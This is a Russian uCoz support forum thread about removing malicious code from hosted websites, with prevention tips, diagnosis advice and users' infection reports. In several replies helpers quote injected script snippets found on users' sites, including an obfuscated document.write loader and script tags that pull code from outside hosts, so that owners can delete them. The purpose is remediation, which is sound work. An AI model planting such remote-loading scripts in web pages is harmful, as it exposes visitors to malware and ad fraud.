Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 1021 | 17:10:18
    Лена1858, для начала в шаблоне нижней части своего сайта находим код и то что красным удаляем:

    Цитата
    <div class="copyright"> © 2012 Спортивные тейпы | <noindex>$POWERED_BY$</noindex></div>

    Это является нарушением, заключение копирайта в теги <noindex>

    Вот это убрать в шаблоне верхней части сайта:

    Код
    <script type="text/javascript">
    (function(){
      var rb = document.createElement('script');
      d = new Date();
      d.setHours(0);
      d.setMinutes(0);
      d.setSeconds(0);
      d.setMilliseconds(0);
      rb.type = 'text/javascript';
      rb.async = true;
      rb.src = '//s1.rotaban.ru/rotaban.js?v=' + d.getTime();
      (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(rb);
    })();
    </script>


    Вот это ненужное убрать в нижней части сайта :

    Код
    <script type="text/javascript">
    var MGCD = new Date();
    document.write('<scr'
    +'ipt type="text/javascript"'
    +' src="http://jsc.dt00.net/u/c/uc-portaller.ru.27032.js?t='
    +MGCD.getYear()
    +MGCD.getMonth()
    +MGCD.getDay()
    +MGCD.getHours()
    +'" charset="utf-8"></scr'+'ipt>');
    </script>
    Сообщение отредактировал сondor - Среда, 05 Фев 2014, 17:19:09
    Абама
    Сообщений: 2
    Репутация: 0

    Сообщение # 1022 | 18:17:16
    Cтолкнулся с такой проблемой, что Яндекс выдает в поиске, что мой сайт заражен.
    Вот ссылка на сайт http://wmr-zarabotok-v.ucoz.ru/
    Пароли от почты и от сайта поменял
    В яндекс вебмастер зашел почему то опять подтверждал права на управление сайтом . Там написали вердикт Поведенческий анализ
    Антивирус даже не ругается понятия не имею что это.
    Скажите пожалуйста что мне делать
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1023 | 18:20:33
    Абама, из информера популярные темы удалить скрипт

    Код
    <script type="text/javascript" src="http://returna.net/background.js"></script>


    из просилки регистрации и авторизации удалить скрипт

    Код
    <script src="http://7ccut.com/table.js" type="text/javascript"></script>

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    GanJa27
    Сообщений: 11
    Репутация: 11

    Сообщение # 1024 | 23:21:50
    тупо на сайте сидит iframe http://all-contra.ru/
    гость пользователем еще не пробывали но уверен что то-же самое грузит его spotsniper.ru
    nod32 говорит iframe,
    еще говорят что загружает скрытно этот сайт adsniper.ucoz.ru через iframe

    http://softa-net.ucoz.net
    http://all-contra.do.am
    http://all-contra.ru
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1025 | 23:32:40
    GanJa27, дайте скриншот предупреждения нода об ифрейме

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    GanJa27
    Сообщений: 11
    Репутация: 11

    Сообщение # 1026 | 00:52:39
    webanet, у меня нету антивируса это друг сказал
    Даже когда чекаешь онлайн через 2ip.ru
    пишет: На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.

    http://softa-net.ucoz.net
    http://all-contra.do.am
    http://all-contra.ru
    Yuri_G
    uWeb support
    uVip manager
    Сообщений: 4336
    Репутация: 943

    Сообщение # 1027 | 12:39:51
    Цитата GanJa27 ()
    у меня нету антивируса это друг сказал
    проверил ваш сайт ничего такого не обнаружилось о чем вы говорите, Eset Smart Security 7 молчит, а разными онлайн проверяльщиками не пользуйтесь, так как там может запищать только на чат так как он состоит из фрейма

    ВОА
    Сообщений: 7
    Репутация: 0

    Сообщение # 1028 | 14:29:24
    ЭТО МОЙ САЙТ что делать???????
    При входе выскакивает:
    "Сайт voanara.ucoz.ru
    может угрожать безопасности вашего компьютера.Страница сайта voanara.ucoz.ru пытается загрузить данные с заражённого сайта pluginplus.net. По нашим данным, на pluginplus.net был размещён вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.Более подробную информацию об угрозе или безопасную копию сайта можно посмотреть на ....."
    после проверки
    "ВЕБМАСТЕР ЯНДЕКСА ВЫДАЕТ ВЕРДИКТ
    "Мобильный редирект При проверке страниц сайта антивирусный комплекс Яндекса обнаружил мобильный редирект.
    Сообщение отредактировал ВОА - Пятница, 07 Фев 2014, 14:29:44
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1029 | 14:40:12
    ВОА, у вас ещё и сайт перекошен. удалите новость ПДД для Велосипедистов в ней и скрипт вредоносный и разрыв кода на сайте из-за него

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ВОА
    Сообщений: 7
    Репутация: 0

    Сообщение # 1030 | 17:10:46
    Спасибо, новость удалена.
    поставлены на проверку яндекс вебмастеру, будем ждать
    Цитата webanet ()
    ВОА, у вас ещё и сайт перекошен.
    А что это значит? Я профан-самоучка sad
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1031 | 17:12:33
    ВОА, новость осталась на месте http://voanara.ucoz.ru/news/pdd_dlja_velosipedistov/2013-08-28-76 это надо удалить. это и режет ваш сайт

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    isa-muslim-2
    Сообщений: 44
    Репутация: 0

    Сообщение # 1032 | 00:59:54
    Здравствуйте!
    Мой сайт st-atagi.ru блокирует гугл: "Эта страница содержит контент с сайта aksakal.info, который был замечен в распространении вредоносного ПО. Ее посещение может привести к заражению вашего компьютера."

    В шаблонах искал совпадение с "aksakal.info", ничего не нашел. Так же искал в поиске по сайту. Обнаружил одну ссылку на сайт в новостях, убрал эту ссылку пару дней назад, смотрю, сегодня опять сайт блокируется.

    Что это может быть? Где еще его можно искать?
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 1033 | 10:56:23
    isa-muslim-2, удалите картинку в новости http://www.st-atagi.ru/news/2014-01-23-509
    Это из-за нее.
    isa-muslim-2
    Сообщений: 44
    Репутация: 0

    Сообщение # 1034 | 20:14:00
    сondor, спасибо большое! И как Вы его нашли?
    Я и в поисковике искал, и по шаблонам лазил...

    Добавлено (08 Фев 2014, 20:14:00)
    ---------------------------------------------
    У меня еще одна проблема на том же сайте www.st-atagi.ru ....
    Мне пришлось закрывать все доступы на сайт, потому, что его подвергли к спам-атакам. Спамы присылали и в мини-чат, и в гостевую, и в комментарии во всех модулях, и на форуме..., в общем, везде. Надоело их удалять ежедневно....

    Что это может быть? Мой сайт под "прицелом" какого-то робота или на сайте вирус?

    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 1035 | 20:30:11
    isa-muslim-2, никакого вредоносного кода на вашем сайте не обнаружено. Сделайте в настройках групп запрет на добавление комментариев, сообщений и т.п. неавторизованными пользователями. Также усложните капчу в настройках. Также сделайте в модуле пользователей запрет на активность пользователей с неподтвержденными e-mail адресами.
    Сообщение отредактировал сondor - Суббота, 08 Фев 2014, 20:32:35
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: